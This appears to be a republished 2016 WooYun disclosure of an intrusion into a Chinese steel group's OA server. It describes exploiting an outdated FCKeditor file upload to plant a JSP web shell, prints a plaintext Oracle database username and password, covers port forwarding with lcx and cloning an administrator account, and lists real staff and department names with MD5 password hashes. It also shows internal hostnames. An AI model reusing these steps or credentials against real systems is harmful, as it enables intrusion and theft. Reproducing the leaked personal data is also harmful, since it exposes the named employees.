攀枝花钢城集团某服务器内网渗透

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-26: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

男女之间相处,男人要处处让着女人。就拿我来说,我做任何事就都让着女朋友,比如让她洗衣服,让她做饭,让她刷碗,让她收拾屋子……

详细说明:

攀枝花钢城集团办公协同系统(OA)使用了低版本的金蝶OA

OA地址: **.**.**.**:7890/oa/themes/mskin/login/login.jsp

微信截图_20160425210115.png





该系统使用了低版本FCKeditor,可上传任意文件

**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/browser.html?Connector=**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector

.png





漏洞证明:

上传shell: 2.jsp

2.png





找到数据库配置文件

code 区域
<Resource name="jdbc/DefaultDS" auth="Container" type="javax.sql.DataSource"
maxActive="100" maxIdle="20" maxWait="10000" initialSize="10" minIdle="10"
removeAbandoned="true" removeAbandonedTimeout="60" logAbandoned="true"
username="oadb" password="gcjtoa" driverClassName="oracle.jdbc.OracleDriver"
url="jdbc:oracle:thin:@//**.**.**.**:1521/oradata"/>





Oracle的数据库

5.png





管理员权限

3.png





只有一个网口,且ip显示是内网。应该是交换机使用了NAT Server服务,将内网80端口映射到公网的7890端口

4.png





上传lcx作端口转发

6.png





修改注册表,克隆管理员用户

7.png





OA用户

8.png





共有1443个用户

9.png





举例

code 区域
欣宇化工技术研发中心	670b14728ad9902aecba32e22fa4f6bd
李洋 202cb962ac59075b964b07152d234b70
欣宇化工海绵钛运行中心 670b14728ad9902aecba32e22fa4f6bd
黄平安 202cb962ac59075b964b07152d234b70
瑞矿政工部 670b14728ad9902aecba32e22fa4f6bd
瑞矿保卫科 8aec51422b30d61bce078b27f0babeb1
瑞矿综合办公室 202cb962ac59075b964b07152d234b70
付成勇 670b14728ad9902aecba32e22fa4f6bd
邱军 202cb962ac59075b964b07152d234b70
任兵 b96946657983c67d690243a42dde4bfe
综合财务部 e99a18c428cb38d5f260853678922e03
综合技术质量部 1b18918b3565fc7ee82291beb1ddb7b7
综合供销部 202cb962ac59075b964b07152d234b70
综合经销部 202cb962ac59075b964b07152d234b70
天洁物业 6364d9d3f59aa53792fa62e5f161ca8a
绿源劳资科 202cb962ac59075b964b07152d234b70
谢永强 670b14728ad9902aecba32e22fa4f6bd
阳鑫办公室 a0260f8b9817d316b32783dd9e644d01
阳鑫财务科 ba311493f529374f0c33b5e9433574d7
瑞天政工(人事)部 670b14728ad9902aecba32e22fa4f6bd
瑞泰电修分厂 202cb962ac59075b964b07152d234b70
攀鑫财务科 202cb962ac59075b964b07152d234b70
瑞通节能服务事业部 670b14728ad9902aecba32e22fa4f6bd





瑞天政工(人事)部

10.png



瑞通西昌运营事业部

瑞通西昌运营事业部.png



绿源综合管理部

11.png



贸易公司财务科

12.png





东西太多了~这里我就不贴数据了。。。。



可进行内网渗透

code 区域
C:\Documents and Settings\Administrator>net view
服务器名称 注释

---------------------------------------------------------------------
\\GCJT-08361BB1B9
\\GQSVR-IMTS
\\GQSVR-MTS
\\HRSRV
\\NC1
\\OASERVER
\\VM01
\\WEB-INTERNAT
\\WIN-8AGEFMEVINN
\\WIN-M2GM273EOU0
\\YCGS-56F26EED9D
命令成功完成。

 

修复方案:

一只充满好奇心的白帽纸,绝无恶意

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-04-28 18:10

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:攀枝花钢城集团某服务器内网渗透 - https://www.15qq.cn/wooyun/940.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知